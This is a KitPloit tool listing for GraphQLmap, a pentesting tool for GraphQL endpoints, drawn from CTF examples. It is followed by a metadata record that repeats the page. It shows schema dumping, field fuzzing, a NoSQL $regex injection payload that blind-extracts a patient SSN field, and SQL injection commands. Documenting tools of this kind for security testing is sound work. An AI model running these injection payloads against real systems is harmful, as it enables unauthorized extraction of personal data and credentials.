GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes

2021-05-22T12:30:00

Description

[![](https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/w640-h328/GraphQLmap.png)](<https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/s813/GraphQLmap.png>) GraphQLmap is a [scripting](<https://www.kitploit.com/search/label/Scripting> "scripting" ) engine to interact with a graphql endpoint for [pentesting](<https://www.kitploit.com/search/label/Pentesting> "pentesting" ) purposes. **Install** $ git clone https://github.com/swisskyrepo/GraphQLmap $ python graphqlmap.py _____ _ ____ _ / ____| | | / __ \| | | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ | | |_ | '__/ _` | '_ \| '_ \| | | | | | '_ ` _ \ / _` | '_ \ | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \_____|_| \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ | | | | |_| |_| Author:Swissky Version:1.0 usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] optional arguments: -h, --help show this help message and exit -u URL URL to query : example.com/graphql?query={} -v [VERBOSITY] Enable verbosity --method [METHOD] HTTP Method to use interact with /graphql endpoint --headers [HEADERS] HTTP Headers sent to /graphql endpoint --json Send requests using POST and JSON **Features and examples** Examples are based on several CTF challenges from HIP2019. **Connect to a graphql endpoint** python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{"Authorization" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o"}' **Dump a GraphQL schema** Use `dump_new` to dump the GraphQL schema, this function will automaticly populate the "autocomplete" with the found fields. [](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $11$" ) [](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $11$" ) [ Live Example](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $11$" ) GraphQLmap > dump_new ============= [SCHEMA] =============== e.g: name[Type]: arg (Type!) Query doctor[]: email (String!), doctors[Doctor]: patients[Patient]: patient[]: id (ID!), allrendezvous[Rendezvous]: rendezvous[]: id (ID!), Doctor id[ID]: firstName[String]: lastName[String]: specialty[String]: patients[None]: rendezvous[None]: email[String]: password[String]: [...] **Interact with a GraphQL endpoint** Write a GraphQL request and execute it. GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}} { "data": { "doctors": [ { "firstName": "Admin", "id": "5d089c51dcab2d0032fdd08d", "lastName": "Admin" } ] } } **GraphQL field fuzzing** Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter. [](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $12$" ) [](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $12$" ) [ Live Example](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $12$" ) GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"AdmiGRAPHQL_CHARSET\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi!\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi$\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi%\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi(\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi)\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi*\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi+\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi,\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi-\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi.\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi/\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi0\"} }"){firstName lastName id}} [+] Query: (45) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi1\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admi?\"} }"){firstName lastName id}} [+] Query: (206) {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin\"} }"){firstName lastName id}} **NoSQLi injection** Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. [](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $13$" ) [](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $13$" ) [ Live Example](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> "GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. $13$" ) GraphQLmap > nosqli Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} Check > 5d089c51dcab2d0032fdd08d Charset > 0123456789abcdef- [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b GraphQLmap > **SQL injection** GraphQLmap > postgresqli GraphQLmap > mysqli GraphQLmap > mssqli **TODO** * Docker with [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) GraphQL * Unit tests * Handle node { user { edges { node { username } } } } **[Download GraphQLmap](<https://github.com/swisskyrepo/GraphQLmap> "Download GraphQLmap" )**

{"id": "KITPLOIT:5693649203913098224", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "GraphQLmap - A Scripting Engine To Interact With A Graphql Endpoint For Pentesting Purposes", "description": "[![](https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/w640-h328/GraphQLmap.png)](<https://1.bp.blogspot.com/-ihaDbywhNQw/YKS25inlRmI/AAAAAAAAWOQ/JCjkKh9Unvclz8On9bTzd5WyYJG3jPLdACNcBGAsYHQ/s813/GraphQLmap.png>)\n\n \n\n\nGraphQLmap is a [scripting](<https://www.kitploit.com/search/label/Scripting> \"scripting\" ) engine to interact with a graphql endpoint for [pentesting](<https://www.kitploit.com/search/label/Pentesting> \"pentesting\" ) purposes.\n\n \n\n\n**Install** \n\n \n \n $ git clone https://github.com/swisskyrepo/GraphQLmap \n $ python graphqlmap.py \n _____ _ ____ _ \n / ____| | | / __ \\| | \n | | __ _ __ __ _ _ __ | |__ | | | | | _ __ ___ __ _ _ __ \n | | |_ | '__/ _` | '_ \\| '_ \\| | | | | | '_ ` _ \\ / _` | '_ \\ \n | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) | \n \\_____|_| \\__,_| .__/|_| |_|\\___\\_\\______|_| |_| |_|\\__,_| .__/ \n | | | | \n |_| |_| \n Author:Swissky Version:1.0 \n usage: graphqlmap.py [-h] [-u URL] [-v [VERBOSITY]] [--method [METHOD]] [--headers [HEADERS]] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL URL to query : example.com/graphql?query={} \n -v [VERBOSITY] Enable verbosity \n --method [METHOD] HTTP Method to use interact with /graphql endpoint \n --headers [HEADERS] HTTP Headers sent to /graphql endpoint \n --json Send requests using POST and JSON\n\n \n**Features and examples** \n\n\nExamples are based on several CTF challenges from HIP2019.\n\n**Connect to a graphql endpoint** \n\n \n \n python3 graphqlmap.py -u https://yourhostname.com/graphql -v --method POST --headers '{\"Authorization\" : \"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXh0Ijoibm8gc2VjcmV0cyBoZXJlID1QIn0.JqqdOesC-R4LtOS9H0y7bIq-M8AGYjK92x4K3hcBA6o\"}' \n \n\n \n**Dump a GraphQL schema** \n\n\nUse `dump_new` to dump the GraphQL schema, this function will automaticly populate the \"autocomplete\" with the found fields. \n[](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n\n[\uf3a5](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n\n[ Live Example](<https://asciinema.org/a/14YuWoDOyCztlx7RFykILit4S> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$11\$\" )\n \n \n GraphQLmap > dump_new \n ============= [SCHEMA] =============== \n e.g: name[Type]: arg (Type!) \n \n Query \n doctor[]: email (String!), \n doctors[Doctor]: \n patients[Patient]: \n patient[]: id (ID!), \n allrendezvous[Rendezvous]: \n rendezvous[]: id (ID!), \n Doctor \n id[ID]: \n firstName[String]: \n lastName[String]: \n specialty[String]: \n patients[None]: \n rendezvous[None]: \n email[String]: \n password[String]: \n [...]\n\n \n**Interact with a GraphQL endpoint** \n\n\nWrite a GraphQL request and execute it.\n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}} \n { \n \"data\": { \n \"doctors\": [ \n { \n \"firstName\": \"Admin\", \n \"id\": \"5d089c51dcab2d0032fdd08d\", \n \"lastName\": \"Admin\" \n } \n ] \n } \n }\n\n \n**GraphQL field fuzzing** \n\n\nUse `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter. \n[](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n\n[\uf3a5](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n\n[ Live Example](<https://asciinema.org/a/ICCz3PqHVNrBf262x6tQfuwqT> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$12\$\" )\n \n \n GraphQLmap > {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"AdmiGRAPHQL_CHARSET\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi!\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi$\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi%\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi(\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi)\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi*\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi+\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi,\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi-\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi.\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi/\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi0\\\"} }\"){firstName lastName id}} \n [+] Query: (45) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi1\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admi?\\\"} }\"){firstName lastName id}} \n [+] Query: (206) {doctors(options: 1, search: \"{ \\\"lastName\\\": { \\\"$regex\\\": \\\"Admin\\\"} }\"){firstName lastName id}}\n\n \n**NoSQLi injection** \n\n\nUse `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. \n[](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n\n[\uf3a5](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n\n[ Live Example](<https://asciinema.org/a/wp2lixHqRV0pxxhZ8nsgUj6s7> \"GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. \$13\$\" )\n \n \n GraphQLmap > nosqli \n Query > {doctors(options: \"{\\\"\\\"patients.ssn\\\":1}\", search: \"{ \\\"patients.ssn\\\": { \\\"$regex\\\": \\\"^BLIND_PLACEHOLDER\\\"}, \\\"lastName\\\":\\\"Admin\\\" , \\\"firstName\\\":\\\"Admin\\\" }\"){id, firstName}} \n Check > 5d089c51dcab2d0032fdd08d \n Charset > 0123456789abcdef- \n [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b \n GraphQLmap >\n\n \n**SQL injection** \n\n \n \n GraphQLmap > postgresqli \n GraphQLmap > mysqli \n GraphQLmap > mssqli\n\n \n**TODO** \n\n\n * Docker with [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) GraphQL\n * Unit tests\n * Handle node\n \n \n { \n user { \n edges { \n node { \n username \n } \n } \n } \n } \n \n\n \n \n\n\n**[Download GraphQLmap](<https://github.com/swisskyrepo/GraphQLmap> \"Download GraphQLmap\" )**\n", "published": "2021-05-22T12:30:00", "modified": "2021-05-22T12:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/05/graphqlmap-scripting-engine-to-interact.html", "reporter": "KitPloit", "references": ["https://github.com/swisskyrepo/GraphQLmap"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:01:58", "viewCount": 226, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1659899726, "score": 1659843777}, "_internal": {"score_hash": "fcd9a7f2e182634e1d4cd0e98bd15245"}, "toolHref": "https://github.com/swisskyrepo/GraphQLmap"}